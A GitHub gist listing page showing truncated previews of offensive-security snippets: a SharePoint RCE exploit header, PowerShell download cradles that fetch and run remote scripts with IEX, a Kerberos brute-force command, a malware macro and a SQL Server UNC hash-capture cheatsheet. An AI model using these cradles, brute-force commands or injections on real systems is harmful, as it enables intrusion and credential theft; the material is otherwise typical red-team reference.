Skip to content

Instantly share code, notes, and snippets.

View Uswernames's full-sized avatar

Uswernames

1 follower · 0 following
View GitHub Profile
@Uswernames
Uswernames / SharePwn_public.py
Created January 29, 2024 16:31 — forked from testanull/SharePwn_public.py
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@Uswernames
Uswernames / server.py
Created April 18, 2023 09:47 — forked from mdonkers/server.py
Simple Python 3 HTTP server for logging all GET and POST requests
#!/usr/bin/env python3
"""
License: MIT License
Copyright (c) 2023 Miel Donkers
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
@Uswernames
Uswernames / DownloadCradles.ps1
Created March 21, 2021 11:40 — forked from Heirhabarov/DownloadCradles.ps1
Download Cradles
################################################## System.Net. cradles ##################################################
# System.Net.Webclient DownloadString
IEX (New-Object Net.Webclient).DownloadString('https://gist.github.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')
# System.Net.Webclient DownloadData
IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.github.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')))
$test = (New-Object Net.Webclient).DownloadData('https://gist.github.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st
# System.Net.Webclient DownloadFile (touches disk)
@Uswernames
Uswernames / kerberos_attacks_cheatsheet.md
Created June 11, 2020 07:23 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Uswernames
Uswernames / gist:a5ea9bab58df1743f911d9b2538861d9
Created March 25, 2020 07:43 — forked from anonymous/gist:d0da355e5c21a122866808d37234cd5d
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@Uswernames
Uswernames / SQL Server UNC Path Injection Cheatsheet
Created November 19, 2019 08:13 — forked from nullbind/SQL Server UNC Path Injection Cheatsheet
SQL Server UNC Path Injection Cheatsheet
This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------